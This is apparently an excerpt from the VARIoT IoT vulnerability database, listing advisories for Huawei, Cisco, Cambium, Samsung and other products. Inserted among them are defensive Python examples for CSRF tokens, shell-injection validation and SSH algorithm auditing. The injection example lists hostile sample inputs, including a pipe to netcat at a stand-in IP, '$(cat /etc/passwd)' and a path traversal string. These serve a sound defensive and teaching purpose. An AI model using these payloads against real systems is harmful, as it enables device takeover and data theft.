VARIoT IoT vulnerabilities database

VAR-201711-0221 CVE-2017-2705 Huawei P9 Smartphone software access control vulnerability CVSS V2: 2.1
CVSS V3: 2.4
Severity: LOW
Huawei P9 smartphones with software versions earlier than EVA-AL10C00B365, EVA-AL00C00B365, EVA-CL00C92B365, EVA-DL00C17B365 and EVA-TL00C01B365 have a phone activation bypass vulnerability. Successful exploitation could allow an unauthenticated attacker to bypass phone activation and reach the settings page of the phone. The Huawei P9 smartphone software therefore contains an access control weakness; exploitation may also result in a denial-of-service condition. Huawei P9 is a smartphone product of Huawei (China). Huawei smartphones are prone to a security-bypass vulnerability: an attacker with physical access to an unactivated phone may exploit this issue to bypass certain security restrictions and cause denial-of-service conditions.
VAR-201711-0214 CVE-2017-2698 Huawei P8 software ddr_devfreq driver buffer overflow vulnerability CVSS V2: 9.3
CVSS V3: 7.8
Severity: HIGH
The ddr_devfreq driver in versions earlier than GRA-UL00C00B197 has a buffer overflow vulnerability. An attacker with root privilege on the Android system can trick a user into installing a malicious application on the smartphone and send crafted parameters to the driver to crash the system or escalate privilege. The P8 software therefore contains a buffer error vulnerability; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Huawei Mate 8 and P9 are smartphone products of Huawei (China). Huawei smartphones are prone to a local buffer-overflow vulnerability. An attacker can exploit this issue to crash the affected driver, denying service to legitimate users, or to execute arbitrary code. Versions of Huawei Smart Phones 5.41 and prior are vulnerable. The ddr_devfreq driver is one of the DDR operating-frequency adjustment drivers. Note that the attacker described already holds root privilege on the Android side; the driver bug is what turns that into a kernel-level crash or further escalation.
VAR-201701-0729 CVE-2017-3804 Multiple Cisco Nexus Switch software IS-IS protocol packet handling device reload vulnerability CVSS V2: 5.7
CVSS V3: 6.1
Severity: MEDIUM
A vulnerability in Intermediate System-to-Intermediate System (IS-IS) protocol packet processing of Cisco Nexus 5000, 6000, and 7000 Series Switches software could allow an unauthenticated, adjacent attacker to cause a reload of the affected device. Switches in the FabricPath domain crash because of an __inst_001__isis_fabricpath hap reset when processing a crafted link-state packet. More Information: CSCvc45002. Known Affected Releases: 7.1(3)N1(2.1) 7.1(3)N1(3.12) 7.3(2)N1(0.296) 8.0(1)S2. Known Fixed Releases: 6.2(18)S11 7.0(3)I5(1.170) 7.0(3)I5(2) 7.1(4)N1(0.4) 7.1(4)N1(1b) 7.1(5)N1(0.986) 7.1(5)N1(1) 7.2(3)D1(0.8) 7.3(2)N1(0.304) 7.3(2)N1(1) 8.0(0.96)S0 8.0(1) 8.0(1)E1 8.0(1)S4 8.3(0)CV(0.788). The vendor has confirmed this vulnerability and tracks it as Bug ID CSCvc45002. An attacker could use it to reload the device. The Cisco Nexus 7000 Series Switches provide the network infrastructure for next-generation unified fabric data centers. A denial-of-service vulnerability exists in multiple Cisco Nexus devices. Cisco Nexus 5000, 6000 and 7000 Series Switches are all switch products of Cisco. Note the attack vector: the attacker must be adjacent, that is, on a link where the switch processes FabricPath IS-IS, not merely IP-reachable.
VAR-201701-0730 CVE-2017-3805 Cisco IOS and Cisco IOx Software web-based management interface unauthenticated information disclosure vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco IOS and Cisco IOx Software could allow an unauthenticated, remote attacker to view confidential information that is displayed without authenticating to the device. Affected Products: This vulnerability affects Cisco IOS Software and Cisco IOx Software running on IR829, IR809, IE4K, and CGR1K platforms. More Information: CSCvb20897. Known Affected Releases: 1.0(0). An attacker can exploit this issue to obtain sensitive information that may aid in further attacks. This issue is being tracked by Cisco bug ID CSCvb20897. The weakness is in the web-based management interface itself, so exposure depends on whether that interface is reachable from untrusted networks.
VAR-201702-0885 CVE-2017-2372 Apple GarageBand and Logic Pro X project file memory corruption vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
An issue was discovered in certain Apple products. GarageBand before 10.1.5 is affected. Logic Pro X before 10.3 is affected. The issue involves the "Projects" component, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted GarageBand project file. Apple has released updates for GarageBand and Logic Pro X. Opening a crafted GarageBand project file may lead to arbitrary code execution on the affected system; failed exploit attempts may result in a denial-of-service condition. CVE-2017-2372: Tyler Bohan of Cisco Talos. Installation note: GarageBand 10.1.5 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 The original Apple message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
VAR-201702-0678 CVE-2017-5159 Phoenix Contact mGuard Security Bypass Vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered on Phoenix Contact mGuard devices that have been updated to Version 8.4.0. When updating an mGuard device to Version 8.4.0 via the update-upload facility, the update will succeed, but it will reset the password of the admin user to its default value. Phoenix Contact mGuard is an industrial security appliance from Phoenix Contact that protects networked systems against unauthorized access. The reset leaves the device with a default admin credential until the operator notices, so an attacker who can reach the management interface can log in as admin, bypass the configured security restrictions and perform unauthorized operations as a foothold for further attacks. Operators who updated via update-upload should verify the admin password immediately after the update and set it again.
VAR-201712-0213 CVE-2017-5254 Cambium Networks ePMP firmware authorization and access control vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
In version 3.5 and prior of Cambium Networks ePMP firmware, the non-administrative users 'installer' and 'home' have the capability of changing passwords for other accounts, including admin, after disabling a client-side protection mechanism. The ePMP firmware therefore has an authorization and access control vulnerability; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Cambium Networks ePMP is a wireless network access platform of Cambium Networks Inc. that supports applications such as video surveillance, Wi-Fi hotspots and sensor connectivity. The flaw in firmware 3.5 and earlier is that only the web UI, not the server side, prevents the installer and home accounts from changing other accounts' passwords. An attacker holding either account can disable the client-side check and change the admin password, taking over the device.
VAR-201712-0214 CVE-2017-5255 Cambium Networks ePMP firmware command injection vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
In version 3.5 and prior of Cambium Networks ePMP firmware, a lack of input sanitation for certain parameters on the web management console allows any authenticated user (including the otherwise low-privilege readonly user) to inject shell meta-characters as part of a specially-crafted POST request to the get_chart function and run OS-level commands, effectively as root. The ePMP firmware therefore has a command injection vulnerability; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Cambium Networks ePMP is a wireless network access platform of Cambium Networks Inc. that supports applications such as video surveillance, Wi-Fi hotspots and sensor connectivity. The vulnerability in firmware 3.5 and earlier stems from the web management console failing to adequately filter input. An attacker with any account, even readonly, can send a specially crafted POST request to the 'get_chart' function to inject shell metacharacters, obtain root-level control of the device, and from there reach the entire WiFi network.
VAR-201712-0215 CVE-2017-5256 Cambium Networks ePMP firmware persistent cross-site scripting vulnerability (Device Name, System Description) CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
In version 3.5 and prior of Cambium Networks ePMP firmware, all authenticated users have the ability to update the Device Name and System Description fields in the web administration console, and those fields are vulnerable to persistent cross-site scripting (XSS) injection. The ePMP firmware therefore contains a cross-site scripting vulnerability through which information may be obtained or falsified. Cambium Networks ePMP is a wireless network access platform of Cambium Networks Inc. that supports applications such as video surveillance, Wi-Fi hotspots and sensor connectivity; the web administration console is its management interface. Because the injected script is stored in the Device Name and System Description fields, it runs in the browser of every user who later views those fields, including an administrator. A remote attacker with any account can exploit this to hijack that user's browser session, control the device, and reach the entire WiFi network.
VAR-201712-0216 CVE-2017-5257 Cambium Networks ePMP firmware cross-site scripting vulnerability via SNMP read/write community CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows (or guesses) the SNMP read/write (RW) community string can insert XSS strings in certain SNMP OIDs which will execute in the context of the currently-logged on user. The ePMP firmware therefore contains a cross-site scripting vulnerability through which information may be obtained or altered. Cambium Networks ePMP is a wireless network access platform of Cambium Networks Inc. that supports applications such as video surveillance, Wi-Fi hotspots and sensor connectivity. The flaw in firmware 3.5 and earlier stems from the program failing to filter values written over SNMP before rendering them in the web console. An attacker who can write to the device via SNMP could exploit the vulnerability to hijack a logged-on user's browser session, control the device, and reach the entire WiFi network. Since SNMPv1/v2c community strings travel in cleartext and are often left at defaults, "knows or guesses" is a low bar; restrict SNMP write access at the network level and use non-default strings.
VAR-201712-0217 CVE-2017-5258 Cambium Networks ePMP firmware cross-site scripting vulnerability via SNMP-triggered configuration restore CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows or can guess the RW community string can provide a URL for a configuration file over SNMP with XSS strings in certain SNMP OIDs, serve it via HTTP, and the affected device will perform a configuration restore using the attacker's supplied config file, including the inserted XSS strings. The ePMP firmware therefore contains a cross-site scripting vulnerability through which information may be obtained or altered. Cambium Networks ePMP is a wireless network access platform of Cambium Networks Inc. that supports applications such as video surveillance, Wi-Fi hotspots and sensor connectivity. The attack needs SNMP write access plus an HTTP server the device can reach; the restored configuration then carries the script into the web console, where it runs in a user's browser. An attacker could exploit this to hijack a user's browser session, control the device, and reach the entire WiFi network.
VAR-201712-0219 CVE-2017-5260 Cambium Networks cnPilot firmware configuration file insecure direct object reference vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, although the option to access the configuration file is not available in the normal web administrative console for the 'user' account, the configuration file is accessible via insecure direct object reference (IDOR) at http://<device-ip-or-hostname>/goform/down_cfg_file by this otherwise low-privilege 'user' account. The cnPilot firmware therefore has an authorization weakness in its configuration handling; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Cambium Networks cnPilot is a cloud-managed router product of Cambium Networks Inc. Hiding a link in the UI is not an access control; the endpoint itself must enforce the role check. An attacker holding the 'user' account can request the URL directly, retrieve the configuration file and the administrator password it contains, and so control the device and the entire WiFi network.
VAR-201712-0220 CVE-2017-5261 Cambium Networks cnPilot firmware path traversal vulnerability CVSS V2: 4.0
CVSS V3: 8.8
Severity: HIGH
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the 'ping' and 'traceroute' functions of the web administrative console expose a file path traversal vulnerability, accessible to all authenticated users. The cnPilot firmware therefore contains a path traversal vulnerability; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Cambium Networks cnPilot is a cloud-managed router product of Cambium Networks Inc.; the web administrative console is its management interface. The path traversal in the 'ping' and 'traceroute' functions of firmware 4.3.2-R4 and earlier stems from the program failing to filter user-submitted input. Any authenticated user could exploit it to read files outside the intended directory, obtain the administrator password, and control the device and the entire WiFi network.
VAR-201712-0221 CVE-2017-5262 Cambium Networks cnPilot firmware information disclosure vulnerability via SNMP read-only community CVSS V2: 7.7
CVSS V3: 8.0
Severity: HIGH
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the SNMP read-only (RO) community string has access to sensitive information by OID reference. The cnPilot firmware therefore contains an information disclosure vulnerability; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Cambium Networks cnPilot is a cloud-managed router product of Cambium Networks Inc. An attacker who knows the read-only community string of a device running firmware 4.3.2-R4 or earlier could query the relevant object identifiers to obtain sensitive information, including usernames and passwords. A read-only community is commonly treated as low-risk and shared widely with monitoring systems, which is exactly why credentials must never be exposed through it.
VAR-201712-0222 CVE-2017-5263 Cambium Networks cnPilot firmware cross-site request forgery vulnerability CVSS V2: 5.4
CVSS V3: 8.0
Severity: HIGH
Versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware lack CSRF controls that can mitigate the effects of CSRF attacks, which are most typically implemented as randomized per-session tokens associated with any web application function, especially destructive ones. The cnPilot firmware therefore contains a cross-site request forgery vulnerability; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Cambium Networks cnPilot is a cloud-managed router product of Cambium Networks Inc. Because firmware 4.3.2-R4 and earlier has no CSRF control, an attacker could lure a logged-in administrator to a page that submits a forged request to the console, for example to obtain or change the administrator password, and so control the device and the entire WiFi network.
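The per-session token control the entry above describes as the usual mitigation, as an added example that is not part of the VARIoT entry or Cambium's firmware. It assumes a device console whose state-changing endpoints (here a hypothetical /change_password) read a session cookie; the session store, trusted origin and endpoint names are all assumptions for this example.

```python
import hmac
import secrets
from typing import Dict, Optional

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
TRUSTED_ORIGIN = "http://192.0.2.1"   # assumed device address for this example


class SessionStore:
    """In-memory stand-in for the device's session table (assumption)."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Dict[str, str]] = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)
        # One unpredictable token per session, generated server-side. A page on
        # the attacker's origin can make the browser send the cookie, but the
        # same-origin policy stops it from reading this token.
        self._sessions[sid] = {"csrf": secrets.token_urlsafe(32)}
        return sid

    def csrf_token(self, sid: str) -> Optional[str]:
        sess = self._sessions.get(sid)
        return sess["csrf"] if sess else None


def handle_request(store: SessionStore, method: str, path: str,
                   cookies: Dict[str, str], form: Dict[str, str],
                   origin: Optional[str] = None) -> int:
    """Return an HTTP status code for a request against the admin console."""
    sid = cookies.get("session")
    expected = store.csrf_token(sid) if sid else None
    if expected is None:
        return 401                       # not logged in

    if method in STATE_CHANGING:
        # Defence in depth: browsers set Origin on cross-site form posts and a
        # page cannot forge it, so a mismatch is an immediate reject.
        if origin is not None and origin != TRUSTED_ORIGIN:
            return 403
        supplied = form.get("csrf_token", "")
        # Constant-time compare so the token cannot be recovered byte by byte.
        if not hmac.compare_digest(supplied, expected):
            return 403

    if path == "/change_password" and method == "POST":
        return 200                       # the password change would happen here
    return 200 if method == "GET" else 404


def scenario() -> Dict[str, int]:
    """Legitimate admin vs. forged cross-site requests riding on the admin's cookie."""
    store = SessionStore()
    admin_sid = store.create()
    other_sid = store.create()
    cookies = {"session": admin_sid}
    form = {"username": "admin", "password": "newpass"}
    return {
        # The admin's own page submits the token the server issued to it.
        "legit": handle_request(store, "POST", "/change_password", cookies,
                                {**form, "csrf_token": store.csrf_token(admin_sid)},
                                origin=TRUSTED_ORIGIN),
        # Attacker's page: the browser attaches the cookie, the form has no token.
        "forged_no_token": handle_request(store, "POST", "/change_password", cookies,
                                          form, origin="http://attacker.example"),
        # Attacker supplies a token that belongs to a different session.
        "forged_wrong_session_token": handle_request(
            store, "POST", "/change_password", cookies,
            {**form, "csrf_token": store.csrf_token(other_sid)}, origin=None),
        # Safe methods need no token, but must never change state.
        "get_status": handle_request(store, "GET", "/status", cookies, {}),
    }


if __name__ == "__main__":
    for name, status in scenario().items():
        print("%-27s -> %d" % (name, status))
```

The token is bound to the session rather than global, so a token captured from one login is useless against another, and the Origin check costs nothing on top of it. A console that only checks the session cookie, as the entry describes, returns 200 for both forged cases.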
VAR-201701-0882 CVE-2017-3303 Oracle E-Business Suite Oracle XML Gateway (Oracle Transport Agent) vulnerability CVSS V2: 5.8
CVSS V3: 8.2
Severity: HIGH
Vulnerability in the Oracle XML Gateway component of Oracle E-Business Suite (subcomponent: Oracle Transport Agent). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle XML Gateway. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle XML Gateway, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle XML Gateway accessible data as well as unauthorized update, insert or delete access to some of Oracle XML Gateway accessible data. CVSS v3.0 Base Score 8.2 (Confidentiality and Integrity impacts). The vulnerability can be exploited over the 'HTTP' protocol. Oracle E-Business Suite provides functions such as customer relationship management, service management, and financial management.
VAR-201701-1165 No CVE Samsung Smartcam Remote Command Execution Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Samsung Smartcam is Samsung's smart webcam. There is a remote command execution vulnerability in Samsung Smartcam: because the file name of an iWatch firmware upgrade is not properly sanitized, a remote attacker can inject commands through a specially crafted request and have them executed on the device with root privileges.
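Both the ePMP get_chart entry (CVE-2017-5255) and the Smartcam entry above describe the same bug class: request data reaching a shell. The example below is added here and is not code from either vendor; the interface-name and firmware-file-name parameters, the allowlist patterns and the sample payloads are assumptions constructed for illustration, and `echo` stands in for whatever binary the real console invokes.

```python
import re
import subprocess
from typing import Callable, List, Tuple

# Constructed sample inputs for this example (not captured traffic). The first
# two are what a legitimate request would carry; the rest are the kind of
# payloads the ePMP get_chart and Smartcam firmware-file-name reports describe.
SAMPLE_INPUTS = {
    "benign_interface": "eth0",
    "benign_firmware": "firmware_v1.2.bin",
    "semicolon": "eth0; id",
    "backticks": "`reboot`",
    "subshell": "$(cat /etc/passwd)",
    "pipe": "fw.bin | nc 203.0.113.5 4444",
    "newline": "eth0\nreboot",
    "traversal": "../../etc/passwd",
}

SHELL_METACHARACTERS = set(";|&$`<>(){}*?~!\n\r\"'\\")

# Allowlists (an assumption for this example): a Linux interface name and an
# uploaded firmware file name never legitimately need anything else.
INTERFACE_RE = re.compile(r"^[a-z][a-z0-9.:-]{0,14}$")
FIRMWARE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def contains_shell_metacharacters(value: str) -> bool:
    """Denylist check: good for logging and detection, not a sufficient control."""
    return any(ch in SHELL_METACHARACTERS for ch in value)


def vulnerable_command(interface: str) -> str:
    """The bug pattern: request data spliced into a string later run via /bin/sh -c."""
    return "echo " + interface


def hardened_command(interface: str) -> List[str]:
    """Allowlist-validate, then build an argv list so no shell ever parses it."""
    if not INTERFACE_RE.fullmatch(interface):
        raise ValueError("rejected interface name: %r" % interface)
    return ["echo", interface]


def validated_firmware_name(name: str) -> str:
    """Reject traversal and metacharacters in an uploaded firmware file name."""
    if "/" in name or ".." in name or not FIRMWARE_RE.fullmatch(name):
        raise ValueError("rejected firmware file name: %r" % name)
    return name


def is_rejected(validator: Callable[[str], object], value: str) -> bool:
    """True when the validator refuses the value."""
    try:
        validator(value)
    except ValueError:
        return True
    return False


def demonstrate(payload: str = "eth0; echo INJECTED") -> Tuple[str, str]:
    """Run one payload both ways and return (shell_output, argv_output).

    shell=True hands the string to /bin/sh, so ';' starts a second command.
    shell=False passes it as a single argv element straight to execve, so the
    metacharacters are inert. A real service would reject the value in
    hardened_command() first and never reach this point.
    """
    shell_out = subprocess.run(vulnerable_command(payload), shell=True,
                               capture_output=True, text=True).stdout
    argv_out = subprocess.run(["echo", payload], shell=False,
                              capture_output=True, text=True).stdout
    return shell_out, argv_out


if __name__ == "__main__":
    for label, value in SAMPLE_INPUTS.items():
        print("%-17s metachars=%-5s interface_rejected=%-5s firmware_rejected=%s" % (
            label, contains_shell_metacharacters(value),
            is_rejected(hardened_command, value),
            is_rejected(validated_firmware_name, value)))
    print(demonstrate())
```

Note that the denylist never fires on the traversal payload while both allowlists reject it: a metacharacter filter is a detection aid, the allowlist plus argv-based execution is the control.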
VAR-201702-0859 CVE-2016-9360 Multiple General Electric Proficy products user password disclosure vulnerability CVSS V2: 4.4
CVSS V3: 6.7
Severity: MEDIUM
An issue was discovered in General Electric (GE) Proficy HMI/SCADA iFIX Version 5.8 SIM 13 and prior versions, Proficy HMI/SCADA CIMPLICITY Version 9.0 and prior versions, and Proficy Historian Version 6.0 and prior versions. An attacker may be able to retrieve user passwords if he or she has access to an authenticated session. GE Proficy HMI/SCADA CIMPLICITY is a client/server based HMI/SCADA solution from General Electric (GE) that captures and shares real-time and historical data across all levels of the enterprise, enabling visualization of processes, equipment and resource monitoring operations. Proficy Historian is a plant data system that collects, archives and distributes large volumes of real-time data at high speed, improving operational visibility and profitability. A local attacker with access to an authenticated session can exploit this vulnerability to obtain sensitive information. Multiple GE products are prone to a local information-disclosure vulnerability.
VAR-201706-0311 CVE-2017-5243 Rapid7 Nexpose hardware appliance weak SSH algorithm configuration vulnerability CVSS V2: 6.8
CVSS V3: 8.5
Severity: HIGH
The default SSH configuration in Rapid7 Nexpose hardware appliances shipped before June 2017 does not specify desired algorithms for key exchange and other important functions. As a result, it falls back to allowing ALL algorithms supported by the relevant version of OpenSSH and makes the installations vulnerable to a range of MITM, downgrade, and decryption attacks. Rapid7 Nexpose therefore contains a weakness in its use of cryptographic algorithms; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Rapid7 Nexpose hardware appliances are appliances from Rapid7 (United States) that ship with Nexpose, a vulnerability management product that correlates different scan results to probe networks in depth. A man-in-the-middle weakness exists in the default SSH configuration of the Rapid7 Nexpose hardware appliance. An attacker positioned on the network path can exploit it to perform man-in-the-middle, downgrade and decryption attacks against SSH sessions to the appliance. The root cause is the absence of explicit KexAlgorithms, Ciphers and MACs directives; pinning them removes the fallback to the OpenSSH default list.
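A check for the condition the entry describes, added here as an example and not Rapid7's code or the appliance's actual sshd_config: it parses an sshd_config file, reports which algorithm directives are absent (and so fall back to the OpenSSH build's defaults) and flags weak entries in the ones that are present. The three config fragments are constructed for the example; the "unpinned" one mirrors the reported state, the "pinned" one is the kind of explicit list that closes it.

```python
import re
from typing import Dict, List

UNPINNED_SSHD_CONFIG = """\
# Constructed for this example: no algorithm directives, so whatever the
# installed OpenSSH version enables by default is negotiable.
Port 22
PermitRootLogin no
PasswordAuthentication no
"""

PINNED_SSHD_CONFIG = """\
# Constructed for this example: explicit, modern lists only.
Port 22
PermitRootLogin no
PasswordAuthentication no
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
HostKeyAlgorithms ssh-ed25519,rsa-sha2-512,rsa-sha2-256
"""

LEGACY_SSHD_CONFIG = """\
# Constructed for this example: directives present but still listing weak entries.
KexAlgorithms diffie-hellman-group1-sha1,curve25519-sha256
Ciphers aes256-cbc,aes256-ctr
MACs hmac-md5,hmac-sha2-256
HostKeyAlgorithms ssh-dss,ssh-ed25519
"""

REQUIRED = ("kexalgorithms", "ciphers", "macs", "hostkeyalgorithms")

# Entries that enable the downgrade, MITM and plaintext-recovery attacks the
# advisory describes: SHA-1 key exchange, CBC/RC4/3DES ciphers, MD5 or
# truncated MACs, and DSA host keys.
WEAK = {
    "kexalgorithms": re.compile(r"^(diffie-hellman-group(1|14)-sha1|diffie-hellman-group-exchange-sha1)$"),
    "ciphers": re.compile(r"^(3des-cbc|blowfish-cbc|cast128-cbc|arcfour(128|256)?|aes(128|192|256)-cbc)$"),
    "macs": re.compile(r"^(hmac-md5|hmac-md5-96|hmac-sha1-96)(-etm@openssh\.com)?$"),
    "hostkeyalgorithms": re.compile(r"^ssh-dss$"),
}


def parse_sshd_config(text: str) -> Dict[str, List[str]]:
    """Return {lowercased directive: [values]} for the global section.

    Comma-separated algorithm lists are split; other directives keep one value.
    Only the first occurrence counts, which is how sshd resolves duplicates.
    Anything after a 'Match' line is conditional and skipped (simplification).
    """
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        if key in directives:
            continue
        directives[key] = [v for v in value.split(",") if v] if key in REQUIRED else [value]
    return directives


def audit_sshd_config(text: str) -> Dict[str, object]:
    """Flag algorithm directives that are absent (default fallback) or list weak entries."""
    cfg = parse_sshd_config(text)
    missing = [d for d in REQUIRED if d not in cfg]
    weak: Dict[str, List[str]] = {}
    for d in REQUIRED:
        bad = [alg for alg in cfg.get(d, []) if WEAK[d].match(alg)]
        if bad:
            weak[d] = bad
    return {"missing": missing, "weak": weak, "ok": not missing and not weak}


if __name__ == "__main__":
    for name, text in (("unpinned", UNPINNED_SSHD_CONFIG),
                       ("legacy", LEGACY_SSHD_CONFIG),
                       ("pinned", PINNED_SSHD_CONFIG)):
        print(name, audit_sshd_config(text))
```

This reads the file only; what the daemon actually negotiates, including the version-specific defaults for anything still unpinned, is what a network-side tool such as ssh-audit reports, and the two checks complement each other.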
VAR-201802-0221 CVE-2017-5251 Insteon Hub unencrypted radio communication vulnerability CVSS V2: 6.8
CVSS V3: 8.1
Severity: HIGH
In version 1012 and prior of Insteon's Insteon Hub, the radio transmissions used for communication between the hub and connected devices are not encrypted. The Insteon Hub therefore contains a cryptographic weakness; exploitation may allow information to be obtained or altered and may cause a denial-of-service condition. Insteon Hub is the central controller of Insteon's home-automation products (Insteon, United States) and can remotely control light bulbs, wall switches, air conditioners and similar devices in the home. An attacker could exploit this vulnerability to bypass authentication.